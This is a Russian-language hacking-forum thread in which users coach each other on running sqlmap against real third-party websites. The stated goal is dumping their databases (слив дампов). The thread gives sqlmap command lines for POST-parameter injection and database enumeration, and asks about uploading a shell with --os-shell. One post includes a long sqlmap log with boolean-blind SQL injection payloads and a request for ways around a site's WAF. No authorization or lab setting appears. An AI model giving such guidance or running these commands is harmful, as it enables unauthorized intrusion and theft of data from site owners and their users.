ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.03.2018, 21:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
695
Репутация:
0
|
|
Здравствуйте, решил заняться сливом дампов, выбрал сайт для тренировки, акушей просканил и вот что получилось.
.SpoilerTarget" type="button">Spoiler: Скрин
Хочу раскрутить уязвимость с помощью sqlmap, что прописывать в sqlmap? Вставлять ссылку с SQL injection?
Вот что в ссылке
.SpoilerTarget" type="button">Spoiler: Скрин
Перевел с джавы, получилось: "По запросу не найдено мест в матрице"
Я думаю написать в sqlmap:
Код:
Code:
slqmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3
Правильно или нет, и надо что-то добавить? |
|
|
|
29.03.2018, 21:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от Mafter
Mafter said:
↑
Здравствуйте, решил заняться сливом дампов, выбрал сайт для тренировки, акушей просканил и вот что получилось.
Spoiler: Скрин
Хочу раскрутить уязвимость с помощью sqlmap, что прописывать в sqlmap? Вставлять ссылку с SQL injection?
Вот что в ссылке
Spoiler: Скрин
Перевел с джавы, получилось: "По запросу не найдено мест в матрице"
Я думаю написать в sqlmap:
Код:
Code:
slqmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3
Правильно или нет, и надо что-то добавить? Нет, не правильно.
sqlmap -u site --data='Тут То что передаётся ПОСТ методом' для этого вам надо нажать на place_name->variant 1 там будет все необходимые параметы
|
|
|
|
29.03.2018, 23:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от Mafter
Mafter said:
↑
Здравствуйте, решил заняться сливом дампов, выбрал сайт для тренировки, акушей просканил и вот что получилось.
Spoiler: Скрин
Хочу раскрутить уязвимость с помощью sqlmap, что прописывать в sqlmap? Вставлять ссылку с SQL injection?
Вот что в ссылке
Spoiler: Скрин
Перевел с джавы, получилось: "По запросу не найдено мест в матрице"
Я думаю написать в sqlmap:
Код:
Code:
slqmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3
Правильно или нет, и надо что-то добавить? у тебя 2 ошибки
1. Там пост метод надо описать уязвимый пареметр который находится в POST, --data="Тут пост параметр"
2. Ты не дописал --dbs
3. (совет) В случае акуши лучше чекни Blind SQL injection, sqlmamp такое быстро взламывает (лично у меня так)
|
|
|
|
30.03.2018, 00:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
759330
Репутация:
147
|
|
Сообщение от Sensoft
Sensoft said:
↑
sqlmamp такое быстро взламывает (лично у меня так) враньё какое ...
|
|
|
|
30.03.2018, 00:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от ms13
ms13 said:
↑
враньё какое ... У меня этот тип дыр SQLmap быстро вскрывает
|
|
|
|
30.03.2018, 00:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
759330
Репутация:
147
|
|
Сообщение от Sensoft
Sensoft said:
↑
У меня этот тип дыр SQLmap быстро вскрывает Ого, таки похекал ту ico корпорацию?
|
|
|
|
30.03.2018, 20:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
695
Репутация:
0
|
|
Сообщение от Sensoft
Sensoft said:
↑
у тебя 2 ошибки
1. Там пост метод надо описать уязвимый пареметр который находится в POST, --data="
Тут пост параметр
"
2. Ты не дописал --dbs
3. (совет) В случае акуши лучше чекни Blind SQL injection, sqlmamp такое быстро взламывает (лично у меня так) а если в Blind SQL injection тоже самое, что и в SQL injection?? То есть, ссылки одинаковые
|
|
|
|
02.04.2018, 19:41
|
|
Новичок
Регистрация: 26.08.2009
Сообщений: 8
Провел на форуме:
375363
Репутация:
16
|
|
Как залить Shell посредством sqlmap ?
--os-shell и брутить локальные пути ?
|
|
|
03.04.2018, 10:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
35643
Репутация:
3
|
|
Тебе в соседней теме ответили, у пользователя под которым ты сидишь не хватает прав для этого!
|
|
|
|
16.04.2018, 01:01
|
|
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264
Репутация:
69
|
|
Подскажите, как бороться? Пытаюсь получить таблицы - выдает 406 ошибку
Код:
Code:
sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --
tables
___
__H__
___ ___[)]_____ ___ ___ {1.2.4.2#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:56:40
[01:56:40] [INFO] parsing HTTP request from '1.txt'
[01:56:40] [DEBUG] not a valid WebScarab log data
[01:56:40] [DEBUG] cleaning up configuration parameters
[01:56:40] [DEBUG] loading WAF script '360'
[01:56:40] [DEBUG] loading WAF script 'airlock'
[01:56:40] [DEBUG] loading WAF script 'anquanbao'
[01:56:40] [DEBUG] loading WAF script 'armor'
[01:56:40] [DEBUG] loading WAF script 'asm'
[01:56:40] [DEBUG] loading WAF script 'aws'
[01:56:40] [DEBUG] loading WAF script 'baidu'
[01:56:40] [DEBUG] loading WAF script 'barracuda'
[01:56:40] [DEBUG] loading WAF script 'bigip'
[01:56:40] [DEBUG] loading WAF script 'binarysec'
[01:56:40] [DEBUG] loading WAF script 'blockdos'
[01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
[01:56:40] [DEBUG] loading WAF script 'cloudflare'
[01:56:40] [DEBUG] loading WAF script 'cloudfront'
[01:56:40] [DEBUG] loading WAF script 'comodo'
[01:56:40] [DEBUG] loading WAF script 'datapower'
[01:56:40] [DEBUG] loading WAF script 'denyall'
[01:56:40] [DEBUG] loading WAF script 'dosarrest'
[01:56:40] [DEBUG] loading WAF script 'dotdefender'
[01:56:40] [DEBUG] loading WAF script 'edgecast'
[01:56:40] [DEBUG] loading WAF script 'expressionengine'
[01:56:40] [DEBUG] loading WAF script 'fortiweb'
[01:56:40] [DEBUG] loading WAF script 'generic'
[01:56:40] [DEBUG] loading WAF script 'hyperguard'
[01:56:40] [DEBUG] loading WAF script 'incapsula'
[01:56:40] [DEBUG] loading WAF script 'isaserver'
[01:56:40] [DEBUG] loading WAF script 'jiasule'
[01:56:40] [DEBUG] loading WAF script 'knownsec'
[01:56:40] [DEBUG] loading WAF script 'kona'
[01:56:40] [DEBUG] loading WAF script 'modsecurity'
[01:56:40] [DEBUG] loading WAF script 'naxsi'
[01:56:40] [DEBUG] loading WAF script 'netcontinuum'
[01:56:40] [DEBUG] loading WAF script 'netscaler'
[01:56:40] [DEBUG] loading WAF script 'newdefend'
[01:56:40] [DEBUG] loading WAF script 'nsfocus'
[01:56:40] [DEBUG] loading WAF script 'paloalto'
[01:56:40] [DEBUG] loading WAF script 'profense'
[01:56:40] [DEBUG] loading WAF script 'proventia'
[01:56:40] [DEBUG] loading WAF script 'radware'
[01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
[01:56:40] [DEBUG] loading WAF script 'safe3'
[01:56:40] [DEBUG] loading WAF script 'safedog'
[01:56:40] [DEBUG] loading WAF script 'secureiis'
[01:56:40] [DEBUG] loading WAF script 'senginx'
[01:56:40] [DEBUG] loading WAF script 'sitelock'
[01:56:40] [DEBUG] loading WAF script 'sonicwall'
[01:56:40] [DEBUG] loading WAF script 'sophos'
[01:56:40] [DEBUG] loading WAF script 'stingray'
[01:56:40] [DEBUG] loading WAF script 'sucuri'
[01:56:40] [DEBUG] loading WAF script 'tencent'
[01:56:40] [DEBUG] loading WAF script 'teros'
[01:56:40] [DEBUG] loading WAF script 'trafficshield'
[01:56:40] [DEBUG] loading WAF script 'urlscan'
[01:56:40] [DEBUG] loading WAF script 'uspses'
[01:56:40] [DEBUG] loading WAF script 'varnish'
[01:56:40] [DEBUG] loading WAF script 'wallarm'
[01:56:40] [DEBUG] loading WAF script 'watchguard'
[01:56:40] [DEBUG] loading WAF script 'webappsecure'
[01:56:40] [DEBUG] loading WAF script 'webknight'
[01:56:40] [DEBUG] loading WAF script 'wordfence'
[01:56:40] [DEBUG] loading WAF script 'yundun'
[01:56:40] [DEBUG] loading WAF script 'yunsuo'
[01:56:40] [DEBUG] loading WAF script 'zenedge'
[01:56:40] [DEBUG] setting the HTTP timeout
[01:56:40] [DEBUG] creating HTTP requests opener object
[01:56:40] [DEBUG] forcing back-end DBMS to user defined value
custom injection marker ('*') found in option '--data'. Do you want to process i
t? [Y/n/q] y
[01:56:41] [DEBUG] resolving hostname 'url'
[01:56:41] [INFO] testing connection to the target URL
[01:56:41] [DEBUG] declared web page charset 'utf-8'
[01:56:41] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
[01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewal
l (360)'
[01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
[01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application F
irewall (Anquanbao)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Def
ense)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manage
r (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web App
lication Firewall (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Fi
rewall (Baidu)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application F
irewall (Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security
Manager (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application F
irewall (BinarySEC)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisc
o Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application
Firewall (CloudFlare)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Fire
wall (Comodo)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IB
M)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Fi
rewall (DenyAll)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Intern
et Security)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Tech
nologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)
'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Fi
rewall (Fortinet)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application
Firewall (art of defence)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application F
irewall (Incapsula/Imperva)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Fir
ewall (Jiasule)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Ak
amai Technologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source We
b Application Firewall (Trustwave)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Applicatio
n Firewall (NetContinuum/Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application F
irewall (Newdefend)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Fir
ewall (NSFOCUS)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Al
to Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Fi
rewall (Armorlogic)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application S
ecurity (IBM)'
[01:56:42] [DEBUG] page not found (404)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMo
de (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firew
all'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Fir
ewall (Safedog)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Securi
ty (BeyondTrust)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporatio
n)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application
Firewall (SiteLock)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)
'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewa
ll (Riverbed / Brocade)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall
(Sucuri)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Applicati
on Firewall (Tencent Cloud Computing)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Fi
rewall Enterprise (Teros/Citrix Systems)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)
'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (Un
ited Security Providers)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Fir
ewall (Wallarm)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Tech
nologies)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firew
all (AQTRONIX)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Fire
wall (Yundun)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Fire
wall (Yunsuo)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Fir
ewall (Zenedge)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
[01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
[01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\art
em\appdata\local\temp\sqlmapuumtkb12408\sqlmapresponse-opc2v1'. If you know the
details on used protection please report it along with specific response to 'dev
@sqlmap.org'
are you sure that you want to continue with further target testing? [y/N] y
[01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
Vector: AND [INFERENCE]
---
[01:56:44] [INFO] testing MySQL
[01:56:44] [DEBUG] resuming configuration option 'code' (200)
[01:56:44] [INFO] confirming MySQL
[01:56:44] [INFO] the back-end DBMS is MySQL
[01:56:44] [INFO] fetching banner
[01:56:44] [INFO] resumed: 5.6.39-cll-lve
[01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: Apache, PHP 7.1.14
back-end DBMS: MySQL >= 5.0.0
banner: '5.6.39-cll-lve'
[01:56:44] [INFO] fetching tables for database: 'database'
[01:56:44] [INFO] fetching number of tables for database 'database'
[01:56:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>51
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
ation step in similar cases
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>48
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>9
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [INFO] retrieved:
[01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
[01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
[01:56:44] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[01:56:46] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
[01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
kind of protection is involved (e.g. WAF)
[01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlma
p\output\url'
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
